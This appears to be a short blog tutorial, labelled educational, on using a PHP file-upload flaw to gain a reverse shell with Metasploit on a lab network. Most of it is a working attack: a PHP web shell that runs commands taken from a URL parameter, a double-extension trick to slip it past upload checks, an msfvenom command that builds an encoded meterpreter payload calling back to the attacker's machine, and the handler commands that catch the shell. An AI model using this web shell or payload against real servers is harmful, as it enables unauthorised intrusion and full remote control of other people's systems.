Metasploit, Reverse shell
2017-12-11 21:48:51
Before we start
only for educational purpose
What you need
- Target machine
192.168.0.102
with php app where you can upload file - Kali linux machine
192.168.0.104
Start
To start play with Reverse shell and metasploit you have to have app where you have possibility to upload php file or php.jpg file :D.
How to test
Try to upload simple php file, if you will meet any problem please play with extension or content type.
Test file
Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php
<?php
if(isset($_GET['cmd'])) {
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}else{
echo "lol";
}
?>
Confirm
You have to confirms that file was uploaded and you can execute it, for example by visiting url 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la
Metasploit / Kali & Update
I tested this on metasploit v4.16.21-dev, if your version is outdated, consider update
apt update; apt install metasploit-framework
generate exploit
msfvenom -p php/meterpreter/reverse\_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg
Important you have to edit 'msfvenom2.php.jpg' and wrap payload by
<?php ... ?>
if you are ready please upload this file to server
Hammer time
in msf console, type
msf >
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse\_tcp
payload => php/meterpreter/reverse\_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
and visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg
bumm, now you should have Reverse shell, type something in msf console like "ls" or "pwd" to have more options type "shell"